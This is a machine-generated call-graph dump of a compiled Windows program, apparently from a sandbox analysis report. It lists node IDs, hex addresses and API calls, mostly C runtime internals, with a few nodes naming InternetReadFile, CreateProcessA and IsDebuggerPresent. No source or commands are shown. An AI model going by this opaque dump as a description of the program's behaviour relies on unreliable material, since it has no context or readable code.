b321dd 109132->109133 109134 b321cf 109132->109134 109135 b259b3 __Stollx 20 API calls 109133->109135 109134->109133 109139 b321f4 109134->109139 109136 b321e5 109135->109136 109333 b25122 26 API calls __cftof 109136->109333 109138 b24974 109138->109058 109141 b36be9 109138->109141 109139->109138 109140 b259b3 __Stollx 20 API calls 109139->109140 109140->109136 109144 b36c05 109141->109144 109145 b36bf7 109141->109145 109142 b259b3 __Stollx 20 API calls 109143 b36c0d 109142->109143 109334 b25122 26 API calls __cftof 109143->109334 109144->109142 109145->109144 109148 b36c2e 109145->109148 109147 b2498b 109147->109058 109147->109065 109148->109147 109149 b259b3 __Stollx 20 API calls 109148->109149 109149->109143 109335 b36e62 109150->109335 109153 b249b4 109153->109054 109153->109070 109154 b34d09 __dosmaperr 20 API calls 109155 b24b37 109154->109155 109156 b24bef 109155->109156 109345 b24c0b 77 API calls std::_Locinfo::_W_Getmonths 109155->109345 109158 b34d66 _free 20 API calls 109156->109158 109158->109153 109160 b24be1 109162 b34d66 _free 20 API calls 109160->109162 109162->109156 109163 b24c00 109164 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109163->109164 109165 b24c0a 109164->109165 109166 b36be9 26 API calls 109167 b24b49 109166->109167 109167->109160 109167->109163 109167->109166 109168 b36e62 33 API calls 109167->109168 109346 b24c49 64 API calls 109167->109346 109347 b36cf0 20 API calls __Stollx 109167->109347 109168->109167 109170 b34d71 RtlFreeHeap 109169->109170 109171 b34d9a _free 109169->109171 109170->109171 109172 b34d86 109170->109172 109171->109054 109173 b259b3 __Stollx 18 API calls 109172->109173 109174 b34d8c GetLastError 109173->109174 109174->109171 109176 b21db6 __FrameHandler3::FrameUnwindToState 109175->109176 109177 b21dc7 109176->109177 109178 b21ddc 109176->109178 109179 b259b3 __Stollx 20 API calls 109177->109179 109187 b21dd7 std::_Xfsopen std::_Locinfo::_Locinfo_dtor 109178->109187 109387 b21afd EnterCriticalSection 109178->109387 109180 b21dcc 109179->109180 109404 b25122 26 API calls __cftof 109180->109404 109183 b21df8 109388 b21d34 109183->109388 109185 b21e03 109405 b21e20 LeaveCriticalSection std::_Xfsopen 109185->109405 109187->109050 109189 b2515a 109188->109189 109582 b24f58 109189->109582 109202 b35834 109192->109202 109194 b358da 109194->109087 109246 b343fe 20 API calls 2 library calls 109195->109246 109197 b259a5 109198 b259b3 109197->109198 109247 b343fe 20 API calls 2 library calls 109198->109247 109200 b259b8 109200->109087 109201->109087 109203 b35840 __FrameHandler3::FrameUnwindToState 109202->109203 109213 b3cba4 EnterCriticalSection 109203->109213 109205 b3584e 109206 b35880 109205->109206 109207 b35875 109205->109207 109209 b259b3 __Stollx 20 API calls 109206->109209 109214 b3595d 109207->109214 109210 b3587b 109209->109210 109229 b358aa LeaveCriticalSection __wsopen_s 109210->109229 109212 b3589d std::_Locinfo::_Locinfo_dtor 109212->109194 109213->109205 109230 b3ce21 109214->109230 109216 b35973 109243 b3cd90 21 API calls 3 library calls 109216->109243 109218 b3596d 109218->109216 109219 b359a5 109218->109219 109220 b3ce21 __wsopen_s 26 API calls 109218->109220 109219->109216 109221 b3ce21 __wsopen_s 26 API calls 109219->109221 109223 b3599c 109220->109223 109224 b359b1 CloseHandle 109221->109224 109222 b359cb 109225 b359ed 109222->109225 109244 b2597d 20 API calls 3 library calls 109222->109244 109226 b3ce21 __wsopen_s 26 API calls 109223->109226 109224->109216 109227 b359bd GetLastError 109224->109227 109225->109210 109226->109219 109227->109216 109229->109212 109231 b3ce43 109230->109231 109232 b3ce2e 109230->109232 109235 b259a0 __dosmaperr 20 API calls 109231->109235 109237 b3ce68 109231->109237 109233 b259a0 __dosmaperr 20 API calls 109232->109233 109234 b3ce33 109233->109234 109236 b259b3 __Stollx 20 API calls 109234->109236 109238 b3ce73 109235->109238 109239 b3ce3b 109236->109239 109237->109218 109240 b259b3 __Stollx 20 API calls 109238->109240 109239->109218 109241 b3ce7b 109240->109241 109245 b25122 26 API calls __cftof 109241->109245 109243->109222 109244->109225 109245->109239 109246->109197 109247->109200 109253 b346ab 109248->109253 109249 b259b3 __Stollx 20 API calls 109250 b3489e 109249->109250 109273 b25122 26 API calls __cftof 109250->109273 109252 b347fd 109252->109103 109260 b34523 109252->109260 109256 b347f4 109253->109256 109270 b3fe56 71 API calls 2 library calls 109253->109270 109255 b3483e 109255->109256 109271 b3fe56 71 API calls 2 library calls 109255->109271 109256->109249 109256->109252 109258 b3485d 109258->109256 109272 b3fe56 71 API calls 2 library calls 109258->109272 109261 b3452f __FrameHandler3::FrameUnwindToState 109260->109261 109274 b2c20b EnterCriticalSection 109261->109274 109263 b3453d 109275 b345bd 109263->109275 109267 b3456e std::_Locinfo::_Locinfo_dtor 109267->109106 109268->109103 109269->109103 109270->109255 109271->109258 109272->109256 109273->109252 109274->109263 109283 b345e0 109275->109283 109276 b3454a 109288 b34579 109276->109288 109277 b34639 109278 b34d09 __dosmaperr 20 API calls 109277->109278 109279 b34642 109278->109279 109281 b34d66 _free 20 API calls 109279->109281 109282 b3464b 109281->109282 109282->109276 109293 b332b1 11 API calls 2 library calls 109282->109293 109283->109276 109283->109277 109283->109283 109291 b21afd EnterCriticalSection 109283->109291 109292 b21b11 LeaveCriticalSection 109283->109292 109285 b3466a 109294 b21afd EnterCriticalSection 109285->109294 109295 b2c253 LeaveCriticalSection 109288->109295 109290 b34580 109290->109267 109291->109283 109292->109283 109293->109285 109294->109276 109295->109290 109296->109115 109300 b368de 109297->109300 109299 b24ae6 109299->109120 109299->109121 109301 b368ea __FrameHandler3::FrameUnwindToState 109300->109301 109308 b2c20b EnterCriticalSection 109301->109308 109303 b368f5 109309 b36939 109303->109309 109307 b36925 std::_Locinfo::_Locinfo_dtor 109307->109299 109308->109303 109310 b3695b 109309->109310 109311 b36948 109309->109311 109310->109311 109314 b3696e 109310->109314 109312 b259b3 __Stollx 20 API calls 109311->109312 109313 b3694d 109312->109313 109329 b25122 26 API calls __cftof 109313->109329 109330 b369de 77 API calls 109314->109330 109317 b36977 _Maklocstr 109318 b369a2 109317->109318 109319 b369b5 109317->109319 109323 b36911 109317->109323 109320 b259b3 __Stollx 20 API calls 109318->109320 109321 b321c2 ___std_exception_copy 26 API calls 109319->109321 109320->109323 109322 b369c0 109321->109322 109322->109323 109324 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109322->109324 109326 b36930 109323->109326 109325 b369dd 109324->109325 109331 b2c253 LeaveCriticalSection 109326->109331 109328 b36937 109328->109307 109329->109323 109330->109317 109331->109328 109332->109129 109333->109138 109334->109147 109336 b36e6e 109335->109336 109337 b36e7c 109335->109337 109348 b36da2 28 API calls 4 library calls 109336->109348 109349 b41f96 109337->109349 109341 b36e93 109343 b34d66 _free 20 API calls 109341->109343 109344 b24b1c 109343->109344 109344->109153 109344->109154 109345->109167 109346->109167 109347->109167 109348->109344 109350 b41fa2 109349->109350 109351 b41fb9 109349->109351 109354 b259b3 __Stollx 20 API calls 109350->109354 109352 b41fc1 109351->109352 109353 b41fd8 109351->109353 109355 b259b3 __Stollx 20 API calls 109352->109355 109376 b32e0d 10 API calls 2 library calls 109353->109376 109357 b41fa7 109354->109357 109358 b41fc6 109355->109358 109374 b25122 26 API calls __cftof 109357->109374 109375 b25122 26 API calls __cftof 109358->109375 109359 b41fdf MultiByteToWideChar 109362 b4200e 109359->109362 109363 b41ffe GetLastError 109359->109363 109378 b35b94 109362->109378 109377 b2597d 20 API calls 3 library calls 109363->109377 109366 b36e8d 109366->109341 109373 b36da2 28 API calls 4 library calls 109366->109373 109368 b4203e 109371 b34d66 _free 20 API calls 109368->109371 109369 b4201d MultiByteToWideChar 109369->109368 109370 b42032 GetLastError 109369->109370 109385 b2597d 20 API calls 3 library calls 109370->109385 109371->109366 109373->109341 109374->109366 109375->109366 109376->109359 109377->109366 109379 b35bd2 109378->109379 109383 b35ba2 std::_Locinfo::_W_Getmonths 109378->109383 109380 b259b3 __Stollx 20 API calls 109379->109380 109382 b35bd0 109380->109382 109381 b35bbd RtlAllocateHeap 109381->109382 109381->109383 109382->109368 109382->109369 109383->109379 109383->109381 109386 b2cfdd 7 API calls 2 library calls 109383->109386 109385->109368 109386->109383 109387->109183 109389 b21d41 109388->109389 109390 b21d56 109388->109390 109391 b259b3 __Stollx 20 API calls 109389->109391 109394 b21d51 std::_Xfsopen 109390->109394 109406 b21b25 109390->109406 109393 b21d46 109391->109393 109423 b25122 26 API calls __cftof 109393->109423 109394->109185 109400 b21d78 109401 b358de Concurrency::details::_CancellationTokenState::_RegisterCallback 31 API calls 109400->109401 109402 b21d7e 109401->109402 109402->109394 109403 b34d66 _free 20 API calls 109402->109403 109403->109394 109404->109187 109405->109187 109407 b21b3d 109406->109407 109411 b21b39 109406->109411 109408 b336a5 __fread_nolock 26 API calls 109407->109408 109407->109411 109409 b21b5d 109408->109409 109424 b3553d 109409->109424 109412 b34e40 109411->109412 109413 b34e56 109412->109413 109414 b21d72 109412->109414 109413->109414 109415 b34d66 _free 20 API calls 109413->109415 109416 b336a5 109414->109416 109415->109414 109417 b336b1 109416->109417 109418 b336c6 109416->109418 109419 b259b3 __Stollx 20 API calls 109417->109419 109418->109400 109420 b336b6 109419->109420 109581 b25122 26 API calls __cftof 109420->109581 109422 b336c1 109422->109400 109423->109394 109425 b35549 __FrameHandler3::FrameUnwindToState 109424->109425 109426 b35551 109425->109426 109430 b35569 109425->109430 109427 b259a0 __dosmaperr 20 API calls 109426->109427 109429 b35556 109427->109429 109428 b35607 109431 b259a0 __dosmaperr 20 API calls 109428->109431 109432 b259b3 __Stollx 20 API calls 109429->109432 109430->109428 109433 b3559e 109430->109433 109434 b3560c 109431->109434 109442 b3555e std::_Locinfo::_Locinfo_dtor 109432->109442 109449 b3cba4 EnterCriticalSection 109433->109449 109436 b259b3 __Stollx 20 API calls 109434->109436 109438 b35614 109436->109438 109437 b355a4 109439 b355c0 109437->109439 109440 b355d5 109437->109440 109504 b25122 26 API calls __cftof 109438->109504 109444 b259b3 __Stollx 20 API calls 109439->109444 109450 b35628 109440->109450 109442->109411 109446 b355c5 109444->109446 109445 b355d0 109503 b355ff LeaveCriticalSection __wsopen_s 109445->109503 109447 b259a0 __dosmaperr 20 API calls 109446->109447 109447->109445 109449->109437 109451 b35656 109450->109451 109452 b3564f 109450->109452 109453 b3565a 109451->109453 109454 b35679 109451->109454 109529 b005bb 109452->109529 109455 b259a0 __dosmaperr 20 API calls 109453->109455 109459 b356ca 109454->109459 109460 b356ad 109454->109460 109458 b3565f 109455->109458 109457 b35830 109457->109445 109462 b259b3 __Stollx 20 API calls 109458->109462 109463 b356e0 109459->109463 109505 b38ff6 109459->109505 109461 b259a0 __dosmaperr 20 API calls 109460->109461 109464 b356b2 109461->109464 109465 b35666 109462->109465 109508 b351cd 109463->109508 109468 b259b3 __Stollx 20 API calls 109464->109468 109522 b25122 26 API calls __cftof 109465->109522 109471 b356ba 109468->109471 109523 b25122 26 API calls __cftof 109471->109523 109472 b35727 109475 b35781 WriteFile 109472->109475 109476 b3573b 109472->109476 109473 b356ee 109477 b356f2 109473->109477 109478 b35714 109473->109478 109480 b357a4 GetLastError 109475->109480 109486 b3570a 109475->109486 109482 b35743 109476->109482 109483 b35771 109476->109483 109479 b357e8 109477->109479 109524 b35160 GetLastError WriteConsoleW CreateFileW __wsopen_s 109477->109524 109525 b34fad 71 API calls 3 library calls 109478->109525 109479->109452 109489 b259b3 __Stollx 20 API calls 109479->109489 109480->109486 109487 b35761 109482->109487 109488 b35748 109482->109488 109515 b35243 109483->109515 109486->109452 109486->109479 109494 b357c4 109486->109494 109527 b35410 8 API calls 2 library calls 109487->109527 109488->109479 109490 b35751 109488->109490 109493 b3580d 109489->109493 109526 b35322 7 API calls 2 library calls 109490->109526 109492 b3575f 109492->109486 109496 b259a0 __dosmaperr 20 API calls 109493->109496 109497 b357cb 109494->109497 109498 b357df 109494->109498 109496->109452 109500 b259b3 __Stollx 20 API calls 109497->109500 109528 b2597d 20 API calls 3 library calls 109498->109528 109501 b357d0 109500->109501 109502 b259a0 __dosmaperr 20 API calls 109501->109502 109502->109452 109503->109442 109504->109442 109536 b38f5d 109505->109536 109546 b3fc47 109508->109546 109510 b351dd 109511 b351e2 109510->109511 109555 b3437a GetLastError 109510->109555 109511->109472 109511->109473 109513 b35205 109513->109511 109514 b35223 GetConsoleMode 109513->109514 109514->109511 109520 b35252 __wsopen_s 109515->109520 109516 b35305 109517 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109516->109517 109521 b3531e 109517->109521 109518 b352c4 WriteFile 109519 b35307 GetLastError 109518->109519 109518->109520 109519->109516 109520->109516 109520->109518 109521->109486 109522->109452 109523->109452 109524->109486 109525->109486 109526->109492 109527->109492 109528->109452 109530 b005c4 109529->109530 109531 b005c6 IsProcessorFeaturePresent 109529->109531 109530->109457 109533 b017a9 109531->109533 109580 b0176d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 109533->109580 109535 b0188c 109535->109457 109537 b3ce21 __wsopen_s 26 API calls 109536->109537 109538 b38f6f 109537->109538 109539 b38f77 109538->109539 109540 b38f88 SetFilePointerEx 109538->109540 109543 b259b3 __Stollx 20 API calls 109539->109543 109541 b38fa0 GetLastError 109540->109541 109542 b38f7c 109540->109542 109545 b2597d 20 API calls 3 library calls 109541->109545 109542->109463 109543->109542 109545->109542 109547 b3fc54 109546->109547 109549 b3fc61 109546->109549 109548 b259b3 __Stollx 20 API calls 109547->109548 109550 b3fc59 109548->109550 109551 b3fc6d 109549->109551 109552 b259b3 __Stollx 20 API calls 109549->109552 109550->109510 109551->109510 109553 b3fc8e 109552->109553 109575 b25122 26 API calls __cftof 109553->109575 109556 b34390 109555->109556 109557 b34396 109555->109557 109576 b32fe9 11 API calls 2 library calls 109556->109576 109559 b34d09 __dosmaperr 20 API calls 109557->109559 109561 b343e5 SetLastError 109557->109561 109560 b343a8 109559->109560 109566 b343b0 109560->109566 109577 b3303f 11 API calls 2 library calls 109560->109577 109561->109513 109563 b34d66 _free 20 API calls 109565 b343b6 109563->109565 109564 b343c5 109564->109566 109567 b343cc 109564->109567 109568 b343f1 SetLastError 109565->109568 109566->109563 109578 b341ec 20 API calls __dosmaperr 109567->109578 109579 b2ca79 64 API calls _abort 109568->109579 109570 b343d7 109572 b34d66 _free 20 API calls 109570->109572 109574 b343de 109572->109574 109574->109561 109574->109568 109575->109550 109576->109557 109577->109564 109578->109570 109580->109535 109581->109422 109583 b24f74 ListArray ___scrt_fastfail 109582->109583 109584 b24fa0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 109583->109584 109587 b25071 ___scrt_fastfail 109584->109587 109585 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109586 b2508f GetCurrentProcess TerminateProcess 109585->109586 109586->109063 109587->109585 109588 a86808 InternetReadFile 109589 a86800 SimpleUString::operator= 109588->109589 109589->109588 109593 a862ad messages 109589->109593 109598 aabba0 109589->109598 109591 a869cd 109610 b25132 109591->109610 109593->109591 109596 a862fb messages 109593->109596 109594 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109597 a866b2 109594->109597 109596->109594 109599 aabbcb 109598->109599 109600 aabcee 109598->109600 109603 aabc3c 109599->109603 109604 aabc12 109599->109604 109623 aadba0 28 API calls SimpleUString::operator= 109600->109623 109602 b25132 messages 26 API calls 109605 aabcf8 109602->109605 109608 aabc23 _Yarn 109603->109608 109615 b0089a 109603->109615 109606 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 109604->109606 109606->109608 109608->109602 109609 aabcac _Yarn messages 109608->109609 109609->109589 109634 b250a7 26 API calls 4 library calls 109610->109634 109612 b25141 109613 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109612->109613 109614 b2514e 109613->109614 109618 b0089f 109615->109618 109617 b008b9 109617->109608 109618->109617 109620 b008bb Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 109618->109620 109624 b2ac7c 109618->109624 109631 b2cfdd 7 API calls 2 library calls 109618->109631 109632 b17e0c RaiseException 109620->109632 109622 b01b6e 109629 b35b94 std::_Locinfo::_W_Getmonths 109624->109629 109625 b35bd2 109626 b259b3 __Stollx 20 API calls 109625->109626 109628 b35bd0 109626->109628 109627 b35bbd RtlAllocateHeap 109627->109628 109627->109629 109628->109618 109629->109625 109629->109627 109633 b2cfdd 7 API calls 2 library calls 109629->109633 109631->109618 109632->109622 109633->109629 109634->109612 109635 b25182 109636 b36b4b 77 API calls 109635->109636 109637 b251ae 109636->109637 109638 b251be 109637->109638 109639 b25277 109637->109639 109640 b251c2 109638->109640 109641 b251df 109638->109641 109642 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109639->109642 109643 b251d4 109640->109643 109646 b36e62 33 API calls 109640->109646 109641->109643 109647 b259b3 __Stollx 20 API calls 109641->109647 109645 b25281 109642->109645 109644 b34d66 _free 20 API calls 109643->109644 109648 b25263 109644->109648 109646->109643 109649 b251fb 109647->109649 109650 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109648->109650 109651 b259b3 __Stollx 20 API calls 109649->109651 109652 b25273 109650->109652 109653 b25202 109651->109653 109654 b259b3 __Stollx 20 API calls 109653->109654 109655 b2521c 109654->109655 109655->109643 109656 b25231 109655->109656 109657 b259b3 __Stollx 20 API calls 109655->109657 109656->109643 109658 b259b3 __Stollx 20 API calls 109656->109658 109657->109656 109658->109643 109659 b376c2 109660 b376d2 109659->109660 109661 b376ea 109659->109661 109662 b259b3 __Stollx 20 API calls 109660->109662 109661->109660 109669 b37701 _strrchr 109661->109669 109663 b376d7 109662->109663 109768 b25122 26 API calls __cftof 109663->109768 109665 b376e2 109666 b377b2 _strrchr 109667 b37802 109666->109667 109668 b377d8 109666->109668 109673 b34d09 __dosmaperr 20 API calls 109667->109673 109670 b36e62 33 API calls 109668->109670 109669->109666 109669->109669 109672 b34d09 __dosmaperr 20 API calls 109669->109672 109671 b377df 109670->109671 109676 b377f8 109671->109676 109705 b378dd 109671->109705 109675 b3775f 109672->109675 109674 b3781c 109673->109674 109678 b37824 109674->109678 109682 b321c2 ___std_exception_copy 26 API calls 109674->109682 109679 b3776a 109675->109679 109680 b37778 109675->109680 109681 b34d66 _free 20 API calls 109676->109681 109686 b34d66 _free 20 API calls 109678->109686 109683 b34d66 _free 20 API calls 109679->109683 109684 b321c2 ___std_exception_copy 26 API calls 109680->109684 109681->109665 109685 b37838 109682->109685 109683->109665 109687 b37786 109684->109687 109688 b37843 109685->109688 109689 b378d0 109685->109689 109686->109676 109687->109689 109692 b36be9 26 API calls 109687->109692 109691 b259b3 __Stollx 20 API calls 109688->109691 109690 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109689->109690 109693 b378dc 109690->109693 109698 b37853 109691->109698 109694 b3779b 109692->109694 109694->109689 109696 b34d66 _free 20 API calls 109694->109696 109695 b321c2 ___std_exception_copy 26 API calls 109695->109698 109696->109666 109697 b36e62 33 API calls 109697->109698 109698->109695 109698->109697 109699 b3789b 109698->109699 109701 b3788f 109698->109701 109700 b259b3 __Stollx 20 API calls 109699->109700 109703 b378a0 109700->109703 109702 b34d66 _free 20 API calls 109701->109702 109702->109676 109704 b378dd 71 API calls 109703->109704 109704->109678 109706 b37903 109705->109706 109707 b378eb 109705->109707 109706->109707 109710 b37919 109706->109710 109711 b3790f 109706->109711 109708 b259b3 __Stollx 20 API calls 109707->109708 109709 b378f0 109708->109709 109777 b25122 26 API calls __cftof 109709->109777 109769 b423d6 109710->109769 109714 b259a0 __dosmaperr 20 API calls 109711->109714 109714->109707 109716 b37940 109718 b34d66 _free 20 API calls 109716->109718 109717 b37957 109774 b3769a 109717->109774 109720 b37948 109718->109720 109722 b34d66 _free 20 API calls 109720->109722 109725 b378fb 109722->109725 109723 b37991 109726 b34d66 _free 20 API calls 109723->109726 109724 b379b9 109727 b259a0 __dosmaperr 20 API calls 109724->109727 109725->109676 109728 b37999 109726->109728 109729 b379ca ListArray 109727->109729 109730 b34d66 _free 20 API calls 109728->109730 109732 b379db CreateProcessA 109729->109732 109731 b379a4 109730->109731 109733 b34d66 _free 20 API calls 109731->109733 109734 b37a18 GetLastError 109732->109734 109735 b37a3d 109732->109735 109733->109725 109778 b2597d 20 API calls 3 library calls 109734->109778 109736 b37afb 109735->109736 109737 b37a49 109735->109737 109779 b20f95 60 API calls _abort 109736->109779 109739 b37a83 109737->109739 109740 b37a4d WaitForSingleObject GetExitCodeProcess 109737->109740 109746 b37ac4 109739->109746 109747 b37a88 109739->109747 109744 b37a73 109740->109744 109745 b37a6c CloseHandle 109740->109745 109742 b37a24 109748 b37a30 109742->109748 109749 b37a29 CloseHandle 109742->109749 109743 b37b02 109750 b37a77 CloseHandle 109744->109750 109751 b37a7e 109744->109751 109745->109744 109752 b37ac8 CloseHandle 109746->109752 109753 b37acf 109746->109753 109754 b37a93 109747->109754 109755 b37a8c CloseHandle 109747->109755 109748->109751 109756 b37a34 CloseHandle 109748->109756 109749->109748 109750->109751 109759 b34d66 _free 20 API calls 109751->109759 109752->109753 109757 b34d66 _free 20 API calls 109753->109757 109754->109751 109758 b37a97 CloseHandle 109754->109758 109755->109754 109756->109751 109760 b37ad7 109757->109760 109758->109751 109761 b37aa8 109759->109761 109762 b34d66 _free 20 API calls 109760->109762 109763 b34d66 _free 20 API calls 109761->109763 109765 b37ae3 109762->109765 109764 b37ab4 109763->109764 109766 b34d66 _free 20 API calls 109764->109766 109767 b34d66 _free 20 API calls 109765->109767 109766->109725 109767->109725 109768->109665 109780 b4205d 109769->109780 109772 b34d66 _free 20 API calls 109773 b37936 109772->109773 109773->109716 109773->109717 109797 b37649 109774->109797 109776 b376be 109776->109723 109776->109724 109777->109725 109778->109742 109779->109743 109781 b42079 109780->109781 109782 b34d09 __dosmaperr 20 API calls 109781->109782 109783 b420a7 109782->109783 109784 b420af 109783->109784 109789 b420c3 109783->109789 109796 b2597d 20 API calls 3 library calls 109784->109796 109786 b420bc 109790 b34d66 _free 20 API calls 109786->109790 109787 b321c2 ___std_exception_copy 26 API calls 109787->109789 109788 b420b6 109791 b259b3 __Stollx 20 API calls 109788->109791 109789->109786 109789->109787 109792 b42118 109789->109792 109793 b4210e 109790->109793 109791->109786 109794 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109792->109794 109793->109772 109795 b42124 109794->109795 109796->109788 109798 b37655 __FrameHandler3::FrameUnwindToState 109797->109798 109805 b2c20b EnterCriticalSection 109798->109805 109800 b37663 109806 b37b03 109800->109806 109804 b37681 std::_Locinfo::_Locinfo_dtor 109804->109776 109805->109800 109809 b37b2c 109806->109809 109807 b37b6a 109811 b34d09 __dosmaperr 20 API calls 109807->109811 109808 b37b58 109810 b259b3 __Stollx 20 API calls 109808->109810 109809->109807 109809->109808 109812 b37670 109810->109812 109813 b37b7e 109811->109813 109817 b3768e 109812->109817 109814 b259b3 __Stollx 20 API calls 109813->109814 109816 b37b8c 109813->109816 109814->109816 109815 b34d66 _free 20 API calls 109815->109812 109816->109815 109820 b2c253 LeaveCriticalSection 109817->109820 109819 b37698 109819->109804 109820->109819 109821 b36eb7 109822 b36ec3 __FrameHandler3::FrameUnwindToState 109821->109822 109823 b36ef2 109822->109823 109824 b36ed1 109822->109824 109825 b36f0d 109823->109825 109829 b36f3d CreatePipe 109823->109829 109826 b259a0 __dosmaperr 20 API calls 109824->109826 109827 b259a0 __dosmaperr 20 API calls 109825->109827 109828 b36ed6 109826->109828 109830 b36f12 109827->109830 109831 b259b3 __Stollx 20 API calls 109828->109831 109832 b36f6f GetLastError 109829->109832 109833 b36f7e 109829->109833 109834 b259b3 __Stollx 20 API calls 109830->109834 109835 b36ede 109831->109835 109886 b2597d 20 API calls 3 library calls 109832->109886 109887 b3cc7e 109833->109887 109838 b36f1a 109834->109838 109884 b25122 26 API calls __cftof 109835->109884 109885 b25122 26 API calls __cftof 109838->109885 109840 b36f83 109842 b36f8c 109840->109842 109900 b37023 LeaveCriticalSection __wsopen_s 109840->109900 109843 b259b3 __Stollx 20 API calls 109842->109843 109845 b36f91 109843->109845 109847 b259a0 __dosmaperr 20 API calls 109845->109847 109846 b36ff4 109848 b3cc7e __wsopen_s 24 API calls 109846->109848 109850 b36f9c CloseHandle CloseHandle 109847->109850 109851 b36ff9 109848->109851 109849 b36ee9 std::_Locinfo::_Locinfo_dtor 109850->109849 109851->109842 109852 b3702b 109851->109852 109901 b37133 LeaveCriticalSection __wsopen_s 109852->109901 109854 b37071 109902 b3046e 26 API calls 2 library calls 109854->109902 109856 b3707d 109857 b3713b 109856->109857 109859 b37086 109856->109859 109858 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109857->109858 109862 b37145 __FrameHandler3::FrameUnwindToState 109858->109862 109903 b3cbc7 109859->109903 109863 b3716e 109862->109863 109864 b3715e 109862->109864 109867 b37186 109863->109867 109868 b37176 109863->109868 109866 b259b3 __Stollx 20 API calls 109864->109866 109865 b3cbc7 __wsopen_s 21 API calls 109865->109849 109869 b37163 109866->109869 109871 b37226 109867->109871 109874 b371b8 109867->109874 109870 b259b3 __Stollx 20 API calls 109868->109870 109913 b25122 26 API calls __cftof 109869->109913 109876 b3717b std::_Locinfo::_Locinfo_dtor 109870->109876 109872 b259b3 __Stollx 20 API calls 109871->109872 109872->109869 109875 b34680 71 API calls 109874->109875 109877 b371c4 109875->109877 109877->109876 109878 b34523 std::_Xfsopen 23 API calls 109877->109878 109879 b371dd 109878->109879 109880 b371f2 109879->109880 109881 b371e5 109879->109881 109912 b3721c LeaveCriticalSection std::_Xfsopen 109880->109912 109882 b259b3 __Stollx 20 API calls 109881->109882 109882->109876 109884->109849 109885->109849 109886->109849 109888 b3cc8a __FrameHandler3::FrameUnwindToState 109887->109888 109914 b2c20b EnterCriticalSection 109888->109914 109890 b3cc91 109891 b3ccb6 109890->109891 109896 b3cd24 EnterCriticalSection 109890->109896 109897 b3ccd8 109890->109897 109918 b3ca5d 21 API calls 3 library calls 109891->109918 109894 b3cd01 std::_Locinfo::_Locinfo_dtor 109894->109840 109895 b3ccbb 109895->109897 109919 b3cba4 EnterCriticalSection 109895->109919 109896->109897 109898 b3cd31 LeaveCriticalSection 109896->109898 109915 b3cd87 109897->109915 109898->109890 109900->109846 109901->109854 109902->109856 109904 b3cbd6 109903->109904 109905 b3cc3f 109903->109905 109904->109905 109910 b3cbfc __wsopen_s 109904->109910 109906 b259b3 __Stollx 20 API calls 109905->109906 109907 b3cc44 109906->109907 109908 b259a0 __dosmaperr 20 API calls 109907->109908 109909 b37110 109908->109909 109909->109865 109910->109909 109911 b3cc26 SetStdHandle 109910->109911 109911->109909 109912->109876 109913->109876 109914->109890 109920 b2c253 LeaveCriticalSection 109915->109920 109917 b3cd8e 109917->109894 109918->109895 109919->109897 109920->109917 109921 b372f6 109922 b37303 109921->109922 109926 b3731b 109921->109926 109923 b259b3 __Stollx 20 API calls 109922->109923 109924 b37308 109923->109924 109971 b25122 26 API calls __cftof 109924->109971 109927 b37313 109926->109927 109928 b37376 109926->109928 109972 b35b37 109926->109972 109930 b336a5 __fread_nolock 26 API calls 109928->109930 109931 b3738e 109930->109931 109941 b38990 109931->109941 109933 b37395 109933->109927 109934 b336a5 __fread_nolock 26 API calls 109933->109934 109935 b373c1 109934->109935 109935->109927 109936 b336a5 __fread_nolock 26 API calls 109935->109936 109937 b373cf 109936->109937 109937->109927 109938 b336a5 __fread_nolock 26 API calls 109937->109938 109939 b373df 109938->109939 109940 b336a5 __fread_nolock 26 API calls 109939->109940 109940->109927 109942 b3899c __FrameHandler3::FrameUnwindToState 109941->109942 109943 b389a4 109942->109943 109944 b389bc 109942->109944 109946 b259a0 __dosmaperr 20 API calls 109943->109946 109945 b38a82 109944->109945 109950 b389f5 109944->109950 109947 b259a0 __dosmaperr 20 API calls 109945->109947 109948 b389a9 109946->109948 109951 b38a87 109947->109951 109949 b259b3 __Stollx 20 API calls 109948->109949 109960 b389b1 std::_Locinfo::_Locinfo_dtor 109949->109960 109952 b38a04 109950->109952 109953 b38a19 109950->109953 109954 b259b3 __Stollx 20 API calls 109951->109954 109955 b259a0 __dosmaperr 20 API calls 109952->109955 109977 b3cba4 EnterCriticalSection 109953->109977 109957 b38a11 109954->109957 109958 b38a09 109955->109958 110044 b25122 26 API calls __cftof 109957->110044 109961 b259b3 __Stollx 20 API calls 109958->109961 109959 b38a1f 109962 b38a50 109959->109962 109963 b38a3b 109959->109963 109960->109933 109961->109957 109978 b38aa3 109962->109978 109966 b259b3 __Stollx 20 API calls 109963->109966 109967 b38a40 109966->109967 109969 b259a0 __dosmaperr 20 API calls 109967->109969 109968 b38a4b 110043 b38a7a LeaveCriticalSection __wsopen_s 109968->110043 109969->109968 109971->109927 109973 b35b94 std::_Locinfo::_W_Getmonths 21 API calls 109972->109973 109974 b35b52 109973->109974 109975 b34d66 _free 20 API calls 109974->109975 109976 b35b5c 109975->109976 109976->109928 109977->109959 109979 b38ab5 109978->109979 109980 b38acd 109978->109980 109981 b259a0 __dosmaperr 20 API calls 109979->109981 109982 b38e37 109980->109982 109987 b38b12 109980->109987 109983 b38aba 109981->109983 109984 b259a0 